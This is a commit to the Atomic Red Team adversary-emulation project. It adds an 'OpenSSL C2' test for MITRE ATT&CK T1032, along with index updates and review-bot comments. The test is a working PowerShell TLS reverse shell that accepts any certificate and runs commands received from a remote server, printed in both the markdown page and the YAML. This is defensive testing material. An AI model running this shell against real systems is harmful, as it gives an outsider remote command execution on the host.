Generate docs from job=validate_atomics_generate_docs branch=master

This commit is contained in:
CircleCI Atomic Red Team doc generator
2020-01-24 15:25:24 +00:00
parent 904b5a59a4
commit d4cb776600
11 changed files with 161 additions and 9 deletions
+53
@@ -0,0 +1,53 @@
# T1032 - Standard Cryptographic Protocol
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1032)
<blockquote>Adversaries may explicitly employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if necessary secret keys are encoded and/or generated within malware samples/configuration files.</blockquote>
## Atomic Tests
- [Atomic Test #1 - OpenSSL C2](#atomic-test-1---openssl-c2)
<br/>
## Atomic Test #1 - OpenSSL C2
Thanks to @OrOneEqualsOne for this quick C2 method.
This is to test to see if a C2 session can be established using an SSL socket.
More information about this technique, including how to set up the listener, can be found here:
https://medium.com/walmartlabs/openssl-server-reverse-shell-from-windows-client-aee2dbfa0926
**Supported Platforms:** Windows
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| server_ip | IP of the external server | String | 127.0.0.1|
| server_port | The port to connect to on the external server | String | 443|
#### Attack Commands: Run with `powershell`!
```
$server_ip = #{server_ip}
$server_port = #{server_port}
$socket = New-Object Net.Sockets.TcpClient('#{server_ip}', #{server_port})
$stream = $socket.GetStream()
$sslStream = New-Object System.Net.Security.SslStream($stream,$false,({$True} -as [Net.Security.RemoteCertificateValidationCallback]))
$sslStream.AuthenticateAsClient('fake.domain', $null, "Tls12", $false)
$writer = new-object System.IO.StreamWriter($sslStream)
$writer.Write('PS ' + (pwd).Path + '> ')
$writer.flush()
[byte[]]$bytes = 0..65535|%{0};
while(($i = $sslStream.Read($bytes, 0, $bytes.Length)) -ne 0)
{$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
$sendback = (iex $data | Out-String ) 2>&1;
$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';
$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
$sslStream.Write($sendbyte,0,$sendbyte.Length);$sslStream.Flush()}
```
<br/>
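Review bot: the first two lines of the attack command, `$server_ip = #{server_ip}` and `$server_port = #{server_port}`, are assigned but never used; the `TcpClient` constructor on the next line reads the `#{server_ip}` and `#{server_port}` placeholders directly. After placeholder substitution with the default the first line becomes `$server_ip = 127.0.0.1`, an unquoted dotted-quad literal that PowerShell will not accept as an expression, so the test fails before the socket is opened. Either drop both assignments or quote the value (`$server_ip = '#{server_ip}'`) and pass the variables to the constructor. One sentence in the description would also help readers: the `{$True}` RemoteCertificateValidationCallback accepts any server certificate, which is what lets the client connect to the self-signed OpenSSL listener from the linked article, and it should not be copied as a pattern for legitimate TLS clients.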
File diff suppressed because one or more lines are too long
+2 -1
@@ -981,7 +981,8 @@
- Atomic Test #4: DNS Large Query Volume [windows]
- Atomic Test #5: DNS Regular Beaconing [windows]
- Atomic Test #6: DNS Long Domain Query [windows]
- T1032 Standard Cryptographic Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1032 Standard Cryptographic Protocol](./T1032/T1032.md)
- Atomic Test #1: OpenSSL C2 [windows]
- T1095 Standard Non-Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1065 Uncommonly Used Port](./T1065/T1065.md)
- Atomic Test #1: Testing usage of uncommonly used port with PowerShell [windows]
+97
@@ -28103,6 +28103,103 @@ command-and-control:
command: |
Set-Location $PathToAtomicsFolder
.\T1071\src\T1071-dns-domain-length.ps1 -Domain #{domain} -Subdomain #{subdomain} -QueryType #{query_type}
T1032:
technique:
x_mitre_data_sources:
- Packet capture
- Netflow/Enclave netflow
- Malware reverse engineering
- Process use of network
- Process monitoring
- SSL/TLS inspection
name: Standard Cryptographic Protocol
description: Adversaries may explicitly employ a known encryption algorithm
to conceal command and control traffic rather than relying on any inherent
protections provided by a communication protocol. Despite the use of a secure
algorithm, these implementations may be vulnerable to reverse engineering
if necessary secret keys are encoded and/or generated within malware samples/configuration
files.
id: attack-pattern--4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5
x_mitre_platforms:
- Linux
- macOS
- Windows
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_version: '1.0'
type: attack-pattern
x_mitre_detection: |-
SSL/TLS inspection is one way of detecting command and control traffic within some encrypted communication channels. (Citation: SANS Decrypting SSL) SSL/TLS inspection does come with certain risks that should be considered before implementing to avoid potential security issues such as incomplete certificate validation. (Citation: SEI SSL Inspection Risks)
If malware uses encryption with symmetric keys, it may be possible to obtain the algorithm and key from samples and use them to decode network traffic to detect malware communications signatures. (Citation: Fidelis DarkComet)
In general, analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_network_requirements: true
created: '2017-05-31T21:30:35.334Z'
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: command-and-control
external_references:
- external_id: T1032
source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1032
- source_name: SANS Decrypting SSL
description: Butler, M. (2013, November). Finding Hidden Threats by Decrypting
SSL. Retrieved April 5, 2016.
url: http://www.sans.org/reading-room/whitepapers/analyst/finding-hidden-threats-decrypting-ssl-34840
- source_name: SEI SSL Inspection Risks
description: Dormann, W. (2015, March 13). The Risks of SSL Inspection. Retrieved
April 5, 2016.
url: https://insights.sei.cmu.edu/cert/2015/03/the-risks-of-ssl-inspection.html
- source_name: Fidelis DarkComet
description: Fidelis Cybersecurity. (2015, August 4). Looking at the Sky for
a DarkComet. Retrieved April 5, 2016.
url: https://www.fidelissecurity.com/sites/default/files/FTA_1018_looking_at_the_sky_for_a_dark_comet.pdf
- source_name: University of Birmingham C2
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
url: https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf
modified: '2019-07-19T18:55:09.403Z'
identifier: T1032
atomic_tests:
- name: OpenSSL C2
description: |
Thanks to @OrOneEqualsOne for this quick C2 method.
This is to test to see if a C2 session can be established using an SSL socket.
More information about this technique, including how to set up the listener, can be found here:
https://medium.com/walmartlabs/openssl-server-reverse-shell-from-windows-client-aee2dbfa0926
supported_platforms:
- windows
input_arguments:
server_ip:
description: IP of the external server
type: String
default: 127.0.0.1
server_port:
description: The port to connect to on the external server
type: String
default: 443
executor:
name: powershell
elevation_required: false
command: |
$server_ip = #{server_ip}
$server_port = #{server_port}
$socket = New-Object Net.Sockets.TcpClient('#{server_ip}', #{server_port})
$stream = $socket.GetStream()
$sslStream = New-Object System.Net.Security.SslStream($stream,$false,({$True} -as [Net.Security.RemoteCertificateValidationCallback]))
$sslStream.AuthenticateAsClient('fake.domain', $null, "Tls12", $false)
$writer = new-object System.IO.StreamWriter($sslStream)
$writer.Write('PS ' + (pwd).Path + '> ')
$writer.flush()
[byte[]]$bytes = 0..65535|%{0};
while(($i = $sslStream.Read($bytes, 0, $bytes.Length)) -ne 0)
{$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
$sendback = (iex $data | Out-String ) 2>&1;
$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';
$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
$sslStream.Write($sendbyte,0,$sendbyte.Length);$sslStream.Flush()}
T1065:
technique:
x_mitre_data_sources:
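Review bot: the OpenSSL C2 entry under `atomic_tests` has no `dependencies` block even though the command only works when a TLS listener is already up on `#{server_ip}:#{server_port}`; with the defaults (`127.0.0.1`, `443`) and no listener the `TcpClient` constructor throws and the test reports a failure that has nothing to do with the technique. Once connected, the `while(($i = $sslStream.Read(...)) -ne 0)` loop has no exit path of its own, so the `powershell` executor blocks until the listener closes the socket. A `dependencies` entry with a `prereq_command` that checks the listener is reachable would let the runner fail fast, and the description should state that the command blocks for the life of the session. Since nothing persists on the host, the absence of a `cleanup_command` is fine.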
+1 -1
@@ -308,7 +308,7 @@
- Atomic Test #6: sftp remote file copy (pull) [linux, macos]
- [T1071 Standard Application Layer Protocol](./T1071/T1071.md)
- Atomic Test #3: Malicious User Agents - Nix [linux, macos]
- T1032 Standard Cryptographic Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1032 Standard Cryptographic Protocol](./T1032/T1032.md)
- T1095 Standard Non-Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1065 Uncommonly Used Port](./T1065/T1065.md)
- Atomic Test #2: Testing usage of uncommonly used port [linux, macos]
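Review bot: in this index (tests tagged `[linux, macos]`) T1032 now links to `./T1032/T1032.md`, but the only test on that page is OpenSSL C2 `[windows]`; compare T1071 directly above, which lists its applicable Atomic Test #3 under the link, while T1095 keeps the CONTRIBUTE A TEST marker. The generator apparently links the page whenever any test exists for the technique. If that is intended, fine, but a reader scanning this index for a Linux/macOS test lands on a page with nothing for their platform, so keeping the CONTRIBUTE A TEST marker when no test matches the index's platform would be clearer.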
+1 -1
@@ -19,7 +19,7 @@
| | | [Trap](./T1154/T1154.md) | | [Masquerading](./T1036/T1036.md) | | [System Network Connections Discovery](./T1049/T1049.md) | | | | Remote Access Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Obfuscated Files or Information](./T1027/T1027.md) | | [System Owner/User Discovery](./T1033/T1033.md) | | | | [Remote File Copy](./T1105/T1105.md) |
| | | [Web Shell](./T1100/T1100.md) | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | [Standard Application Layer Protocol](./T1071/T1071.md) |
| | | | | [Process Injection](./T1055/T1055.md) | | | | | | Standard Cryptographic Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | | | | [Process Injection](./T1055/T1055.md) | | | | | | [Standard Cryptographic Protocol](./T1032/T1032.md) |
| | | | | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Standard Non-Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | | | | Revert Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | [Uncommonly Used Port](./T1065/T1065.md) |
| | | | | [Rootkit](./T1014/T1014.md) | | | | | | [Web Service](./T1102/T1102.md) |
+1 -1
@@ -331,7 +331,7 @@
- Atomic Test #6: sftp remote file copy (pull) [linux, macos]
- [T1071 Standard Application Layer Protocol](./T1071/T1071.md)
- Atomic Test #3: Malicious User Agents - Nix [linux, macos]
- T1032 Standard Cryptographic Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1032 Standard Cryptographic Protocol](./T1032/T1032.md)
- T1095 Standard Non-Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1065 Uncommonly Used Port](./T1065/T1065.md)
- Atomic Test #2: Testing usage of uncommonly used port [linux, macos]
+1 -1
@@ -19,7 +19,7 @@
| | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Indicator Removal from Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [System Network Configuration Discovery](./T1016/T1016.md) | | | | Remote Access Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | | [Rc.common](./T1163/T1163.md) | | [Indicator Removal on Host](./T1070/T1070.md) | | [System Network Connections Discovery](./T1049/T1049.md) | | | | [Remote File Copy](./T1105/T1105.md) |
| | | [Re-opened Applications](./T1164/T1164.md) | | [Install Root Certificate](./T1130/T1130.md) | | [System Owner/User Discovery](./T1033/T1033.md) | | | | [Standard Application Layer Protocol](./T1071/T1071.md) |
| | | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | LC_MAIN Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | Standard Cryptographic Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | LC_MAIN Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | [Standard Cryptographic Protocol](./T1032/T1032.md) |
| | | [Setuid and Setgid](./T1166/T1166.md) | | [Launchctl](./T1152/T1152.md) | | | | | | Standard Non-Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | | [Startup Items](./T1165/T1165.md) | | [Masquerading](./T1036/T1036.md) | | | | | | [Uncommonly Used Port](./T1065/T1065.md) |
| | | [Trap](./T1154/T1154.md) | | [Obfuscated Files or Information](./T1027/T1027.md) | | | | | | [Web Service](./T1102/T1102.md) |
+1 -1
@@ -19,7 +19,7 @@
| | [Mshta](./T1170/T1170.md) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launch Daemon](./T1160/T1160.md) | [DLL Search Order Hijacking](./T1038/T1038.md) | LLMNR/NBT-NS Poisoning and Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Remote System Discovery](./T1018/T1018.md) | Taint Shared Content [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | Remote Access Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | [PowerShell](./T1086/T1086.md) | [Emond](./T1519/T1519.md) | [New Service](./T1050/T1050.md) | [DLL Side-Loading](./T1073/T1073.md) | [Network Sniffing](./T1040/T1040.md) | [Security Software Discovery](./T1063/T1063.md) | Third-party Software [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | [Remote File Copy](./T1105/T1105.md) |
| | [Regsvcs/Regasm](./T1121/T1121.md) | External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Parent PID Spoofing](./T1502/T1502.md) | [Deobfuscate/Decode Files or Information](./T1140/T1140.md) | [Password Filter DLL](./T1174/T1174.md) | [Software Discovery](./T1518/T1518.md) | Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | [Standard Application Layer Protocol](./T1071/T1071.md) |
| | [Regsvr32](./T1117/T1117.md) | [File System Permissions Weakness](./T1044/T1044.md) | Path Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disabling Security Tools](./T1089/T1089.md) | [Private Keys](./T1145/T1145.md) | [System Information Discovery](./T1082/T1082.md) | [Windows Admin Shares](./T1077/T1077.md) | | | Standard Cryptographic Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | [Regsvr32](./T1117/T1117.md) | [File System Permissions Weakness](./T1044/T1044.md) | Path Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disabling Security Tools](./T1089/T1089.md) | [Private Keys](./T1145/T1145.md) | [System Information Discovery](./T1082/T1082.md) | [Windows Admin Shares](./T1077/T1077.md) | | | [Standard Cryptographic Protocol](./T1032/T1032.md) |
| | [Rundll32](./T1085/T1085.md) | [Hidden Files and Directories](./T1158/T1158.md) | [Plist Modification](./T1150/T1150.md) | Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Securityd Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Network Configuration Discovery](./T1016/T1016.md) | [Windows Remote Management](./T1028/T1028.md) | | | Standard Non-Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | [Scheduled Task](./T1053/T1053.md) | [Hooking](./T1179/T1179.md) | Port Monitors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Steal Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Network Connections Discovery](./T1049/T1049.md) | | | | [Uncommonly Used Port](./T1065/T1065.md) |
| | [Scripting](./T1064/T1064.md) | [Hypervisor](./T1062/T1062.md) | [PowerShell Profile](./T1504/T1504.md) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Steal Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Owner/User Discovery](./T1033/T1033.md) | | | | [Web Service](./T1102/T1102.md) |
+2 -1
@@ -728,7 +728,8 @@
- Atomic Test #4: DNS Large Query Volume [windows]
- Atomic Test #5: DNS Regular Beaconing [windows]
- Atomic Test #6: DNS Long Domain Query [windows]
- T1032 Standard Cryptographic Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1032 Standard Cryptographic Protocol](./T1032/T1032.md)
- Atomic Test #1: OpenSSL C2 [windows]
- T1095 Standard Non-Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1065 Uncommonly Used Port](./T1065/T1065.md)
- Atomic Test #1: Testing usage of uncommonly used port with PowerShell [windows]
+1 -1
@@ -18,7 +18,7 @@
| | [Regsvcs/Regasm](./T1121/T1121.md) | External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Path Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Side-Loading](./T1073/T1073.md) | [Password Filter DLL](./T1174/T1174.md) | [Security Software Discovery](./T1063/T1063.md) | [Windows Admin Shares](./T1077/T1077.md) | | | Remote Access Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | [Regsvr32](./T1117/T1117.md) | [File System Permissions Weakness](./T1044/T1044.md) | Port Monitors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Deobfuscate/Decode Files or Information](./T1140/T1140.md) | [Private Keys](./T1145/T1145.md) | [Software Discovery](./T1518/T1518.md) | [Windows Remote Management](./T1028/T1028.md) | | | [Remote File Copy](./T1105/T1105.md) |
| | [Rundll32](./T1085/T1085.md) | [Hidden Files and Directories](./T1158/T1158.md) | [PowerShell Profile](./T1504/T1504.md) | [Disabling Security Tools](./T1089/T1089.md) | Steal Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Information Discovery](./T1082/T1082.md) | | | | [Standard Application Layer Protocol](./T1071/T1071.md) |
| | [Scheduled Task](./T1053/T1053.md) | [Hooking](./T1179/T1179.md) | [Process Injection](./T1055/T1055.md) | Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Two-Factor Authentication Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Network Configuration Discovery](./T1016/T1016.md) | | | | Standard Cryptographic Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | [Scheduled Task](./T1053/T1053.md) | [Hooking](./T1179/T1179.md) | [Process Injection](./T1055/T1055.md) | Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Two-Factor Authentication Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Network Configuration Discovery](./T1016/T1016.md) | | | | [Standard Cryptographic Protocol](./T1032/T1032.md) |
| | [Scripting](./T1064/T1064.md) | [Hypervisor](./T1062/T1062.md) | SID-History Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [System Network Connections Discovery](./T1049/T1049.md) | | | | Standard Non-Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | [Service Execution](./T1035/T1035.md) | [Image File Execution Options Injection](./T1183/T1183.md) | [Scheduled Task](./T1053/T1053.md) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [System Owner/User Discovery](./T1033/T1033.md) | | | | [Uncommonly Used Port](./T1065/T1065.md) |
| | [Signed Binary Proxy Execution](./T1218/T1218.md) | LSASS Driver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Service Registry Permissions Weakness](./T1058/T1058.md) | [File Deletion](./T1107/T1107.md) | | [System Service Discovery](./T1007/T1007.md) | | | | [Web Service](./T1102/T1102.md) |